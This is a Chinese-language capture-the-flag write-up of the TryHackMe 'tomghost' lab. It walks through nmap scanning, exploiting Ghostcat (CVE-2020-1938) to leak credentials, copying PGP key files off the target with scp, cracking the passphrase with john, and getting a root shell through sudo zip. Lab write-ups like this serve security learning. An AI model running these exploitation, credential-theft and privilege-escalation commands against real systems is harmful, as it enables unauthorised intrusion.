TryHackMe | tomghost 打靶记录
https://tryhackme.com/room/tomghost
nmap扫描
# yunki @ yunki in ~/tryHackMe/tomghost [9:54:39]
$ sudo nmap -sC -sV -O -oA nmap/detail-scan 10.10.171.79
[sudo] yunki 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 09:56 CST
Nmap scan report for 10.10.171.79
Host is up (0.20s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3c89f0b6ac5fe95540be9e3ba93db7c (RSA)
| 256 dd1a09f59963a3430d2d90d8e3e11fb9 (ECDSA)
|_ 256 48d1301b386cc653ea3081805d0cf105 (ED25519)
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.30
|_http-title: Apache Tomcat/9.0.30
|_http-favicon: Apache Tomcat
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=4/3%OT=22%CT=1%CU=41565%PV=Y%DS=2%DC=I%G=Y%TM=642A326C
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=4%ISR=10F%TI=Z%CI=I%II=I%TS=8)SEQ(
OS:SP=100%GCD=1%ISR=10F%TI=Z%II=I%TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3
OS:=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=6
OS:8DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.14 seconds
CVE-2020-1938漏洞利用
goole一下8009 Apache Jserv (Protocol v1.3) exploit
,发现是存在漏洞了,于是找到了PoChttps://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat
这里将项目里的py文件保存下来利用。
# yunki @ yunki in ~/tryHackMe/tomghost [10:04:43]
$ python CVE-2020-1938.py 10.10.171.79 -p 8009 -f WEB-INF/web.xml
Getting resource at ajp13://10.10.171.79:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
skyfuck:8730281lkjlkjdqlksalks
</description>
</web-app>
这里获得了一个凭据skyfuck:8730281lkjlkjdqlksalks
。尝试ssh登录。
获得初始权限
# yunki @ yunki in ~/tryHackMe/tomghost [9:58:34]
$ ssh skyfuck@10.10.171.79
The authenticity of host '10.10.171.79 (10.10.171.79)' can't be established.
ECDSA key fingerprint is SHA256:hNxvmz+AG4q06z8p74FfXZldHr0HJsaa1FBXSoTlnss.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.171.79' (ECDSA) to the list of known hosts.
skyfuck@10.10.171.79's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
skyfuck@ubuntu:~$
提升权限
gpg decrypt
通过运行linPEAS.sh,发现了一些私钥文件,这里将这两个文件传到我的kali上。
skyfuck@ubuntu:~$ scp credential.pgp yunki@10.9.63.59:/home/yunki/tryHackMe/tomghost
yunki@10.9.63.59's password:
credential.pgp 100% 394 0.4KB/s 00:00
skyfuck@ubuntu:~$ scp tryhackme.asc yunki@10.9.63.59:/home/yunki/tryHackMe/tomghost
yunki@10.9.63.59's password:
tryhackme.asc
# yunki @ yunki in ~/tryHackMe/tomghost [10:40:14]
$ gpg2john tryhackme.asc > hash
File tryhackme.asc
# yunki @ yunki in ~/tryHackMe/tomghost [10:40:30]
$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru (tryhackme)
1g 0:00:00:00 DONE (2023-04-03 10:40) 4.347g/s 4660p/s 4660c/s 4660C/s marshall..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
# yunki @ yunki in ~/tryHackMe/tomghost [10:40:48]
$ gpg -d credential.pgp
gpg: 钥匙箱‘/home/yunki/.gnupg/pubring.kbx’已创建
gpg: 由 ELG 密钥加密、密钥号为 61E104A66184FBCC
gpg: 解密失败:缺少私钥
# yunki @ yunki in ~/tryHackMe/tomghost [10:41:35]
$ gpg --import tryhackme.asc
gpg: 目录‘/home/yunki/.gnupg’已创建
gpg: 钥匙箱‘/home/yunki/.gnupg/pubring.kbx’已创建
gpg: /home/yunki/.gnupg/trustdb.gpg:建立了信任度数据库
gpg: 密钥 8F3DA3DEC6707170:公钥 “tryhackme <stuxnet@tryhackme.com>” 已导入
gpg: 密钥 8F3DA3DEC6707170:私钥已导入
gpg: 密钥 8F3DA3DEC6707170:“tryhackme <stuxnet@tryhackme.com>” 未改变
gpg: 处理的总数:2
gpg: 已导入:1
gpg: 未改变:1
gpg: 读取的私钥:1
gpg: 导入的私钥:1
# yunki @ yunki in ~/tryHackMe/tomghost [10:42:03]
$ gpg -d credential.pgp
gpg: 注意:接收者的偏好设置中找不到密文算法 CAST5
gpg: 由 1024 位的 ELG 密钥加密,标识为 61E104A66184FBCC,生成于 2020-03-11
“tryhackme <stuxnet@tryhackme.com>”
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
获得了另一个凭据merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
,ssh登录。
skyfuck@ubuntu:~$ su merlin
Password:
merlin@ubuntu:/home/skyfuck$ whoami
merlin
提权到Root
发现zip有root权限,在gtfobins搜一下,尝试。或者使用这个sudo zip createdfile -T — unzip-command=”sh -c /bin/bash”
。
merlin@ubuntu:/home/skyfuck$
merlin@ubuntu:/home/skyfuck$ TF=$(mktemp -u)
merlin@ubuntu:/home/skyfuck$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 31%)
# whoami
rm: missing operand
Try 'rm --help' for more information.
# whoami
root
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:69:2d:5c:14:a5 brd ff:ff:ff:ff:ff:ff
inet 10.10.48.225/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::69:2dff:fe5c:14a5/64 scope link
valid_lft forever preferred_lft forever